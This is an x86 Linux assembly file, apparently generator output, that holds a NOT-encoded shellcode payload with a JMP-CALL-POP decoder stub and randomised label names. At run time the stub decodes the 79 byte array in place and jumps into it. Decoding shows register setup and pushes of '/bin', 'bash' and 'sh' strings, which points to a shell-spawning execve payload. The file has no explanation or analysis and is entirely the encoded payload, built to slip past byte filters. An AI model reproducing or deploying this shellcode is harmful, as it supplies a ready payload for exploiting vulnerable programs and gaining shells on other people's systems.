section .text
global _start
_start:
	jmp short YUhJbnmbZ
pZCedh:
	pop esi
	xor ecx, ecx
	mov cl, 79
nASPEyYILYLGHHwFRw:
	not byte [esi]
	inc esi
	loop nASPEyYILYLGHHwFRw
	jmp short oDYfKkKtbVcjQAKJkXt
YUhJbnmbZ:
	call pZCedh
	oDYfKkKtbVcjQAKJkXt: 		db	0xce,0x3f,0xaf,0x97,0x9d,0x9e,0x8c,0x97,0x97,0x9d,0x96,0x91,0xd0,0x97,0xd0,0xd0,0xd0,0xd0,0x76,0x1c,0xaf,0x97,0x9c,0x6f,0x6f,0x6f,0x97,0xd2,0x91,0x90,0x8d,0x76,0xbb,0xdb,0xfa,0xaf,0x97,0x97,0xa2,0xc5,0xa5,0x97,0xa4,0x9d,0x9e,0x8c,0x97,0xaf,0xac,0xce,0xc2,0x39,0xbb,0xdb,0xf4,0xdf,0xaf,0x72,0xcb,0xdb,0x72,0xb1,0xeb,0xae,0xac,0x76,0x1e,0xaf,0x72,0xa9,0xfb,0xad,0x72,0xeb,0xdb,0x4f,0xf4,0x32,0x7f
